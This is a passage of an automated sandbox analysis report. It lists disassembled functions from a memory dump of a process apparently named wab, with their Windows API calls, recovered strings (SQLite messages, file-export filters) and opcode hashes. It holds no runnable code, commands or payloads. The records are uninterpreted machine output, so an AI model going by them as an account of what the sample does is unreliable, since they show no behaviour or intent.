                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2350177629-0
                                                                                                                                                                                                                          • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                          • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                          • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                          • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 265355444-0
                                                                                                                                                                                                                          • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                          • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1973883786-0
                                                                                                                                                                                                                          • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                          • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004185FC
                                                                                                                                                                                                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@AttributesFilememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 776155459-0
                                                                                                                                                                                                                          • Opcode ID: 0f4d7603f8fb496cf733ea50d928d497895b02188797bdb70aeae8633e108f7d
                                                                                                                                                                                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f4d7603f8fb496cf733ea50d928d497895b02188797bdb70aeae8633e108f7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2308052813-0
                                                                                                                                                                                                                          • Opcode ID: 6248b2b7f6a479c554c71b0c61ae383c8a643aca280bf9f33ef5fcf46466946d
                                                                                                                                                                                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6248b2b7f6a479c554c71b0c61ae383c8a643aca280bf9f33ef5fcf46466946d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PathTemp$??3@
                                                                                                                                                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                          • API String ID: 1589464350-1420421710
                                                                                                                                                                                                                          • Opcode ID: c8350a72466cbc4bd1e5c41b0b1d0b837946de2a99fd363d48ea7ac73f264160
                                                                                                                                                                                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8350a72466cbc4bd1e5c41b0b1d0b837946de2a99fd363d48ea7ac73f264160
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                            • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                          • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                          • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                          • String ID: General
                                                                                                                                                                                                                          • API String ID: 999786162-26480598
                                                                                                                                                                                                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                                                                                                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                          • API String ID: 0-1953309616
                                                                                                                                                                                                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                                                                                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 918fb40db202875b378d842bfaa161541e598b9eb5485fff4299785a3e50709c
                                                                                                                                                                                                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 918fb40db202875b378d842bfaa161541e598b9eb5485fff4299785a3e50709c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2903831945-0
                                                                                                                                                                                                                          • Opcode ID: 1f9670b26524ddcc1a9c49ebc2632eb8f83c4518f6bd06434b5022e15632c249
                                                                                                                                                                                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f9670b26524ddcc1a9c49ebc2632eb8f83c4518f6bd06434b5022e15632c249
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
